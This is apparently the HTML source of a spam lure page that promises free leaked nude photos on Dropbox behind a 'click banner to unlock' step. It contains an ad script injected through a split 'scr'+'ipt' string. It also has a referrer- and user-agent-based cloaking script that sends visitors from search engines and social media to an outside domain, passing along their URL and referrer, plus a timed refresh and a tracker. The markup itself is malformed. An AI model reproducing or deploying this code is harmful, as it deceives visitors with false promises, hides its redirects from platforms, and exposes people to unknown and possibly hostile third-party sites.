<!DOCTYPE html>
<html lang="en">
<head>

    <meta charset="UTF-8">
    <title>free dropbox collection</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        .container h1 {
            font-size: 8vw;
        }
    </style>
</head>
</style>
<meta http-equiv="refresh" content="60; url=home.html">

</head>
<body> <!-- Bootstrap core CSS -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha512-MoRNloxbStBcD8z3M/2BmnT+rg4IsMxPkXaGh2zD6LGNNFE80W3onsAhRcMAMrSoyWL9xD7Ert0men7vR8LUZg==" crossorigin="anonymous" />

    <style>
      .bd-placeholder-img {
        font-size: 1.125rem;
        text-anchor: middle;
        -webkit-user-select: none;
        -moz-user-select: none;
        -ms-user-select: none;
        user-select: none;
      }

      @media (min-width: 768px) {
        .bd-placeholder-img-lg {
          font-size: 3.5rem;
        }
      }
   </style>
    <!-- Custom styles for this template -->
    <link href="css/style.css" rel="stylesheet">
  </head>
  <body class="d-flex flex-column h-100">
    <!-- Begin page content -->
<main role="main" class="flex-shrink-0">
  <div class="container">
    <img src="images/logo-ig.png" style="width: 250px;">
    <br /></body>
<body>
<center>
<font color="800000">
<div class="padd">
<h2>FREE 10 LINK DROPBOX NUDES</h2>
<h2>CLICK BANNER TO UNLOCK FILE</h2>
<h3>Please Wait For 10 Second ....</h3>
</div>
</font>

 

		<center><script type="text/javascript">
	atOptions = {
		'key' : 'a8351666b657d6a5a73363aa16a21f1c',
		'format' : 'iframe',
		'height' : 250,
		'width' : 300,
		'params' : {}
	};
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://payoffyes.com/a8351666b657d6a5a73363aa16a21f1c/invoke.js"></scr' + 'ipt>');
</script></center>


<center><script>
var ars = 'http://tech.pandudita.com';

if(['.google.', 'bing.', 'yandex.', 'facebook.', 'instagram.', 'pinterest.'].some(s => document.referrer.toLowerCase().includes(s)) || ['fb', 'facebook', 'pinterest', 'twitter'].some(s => navigator.userAgent.toLowerCase().includes(s))){ window.location.href = ars + '/?arsae='+ encodeURIComponent(window.location.href) + '&arsae_ref='+ encodeURIComponent(document.referrer) }
</script></center>
<center><!--ads/responsive.txt--></center>




</body>

</html>

<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4694269,4,0,0,0,00000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4694269&101" alt="" border="0"></a></noscript>
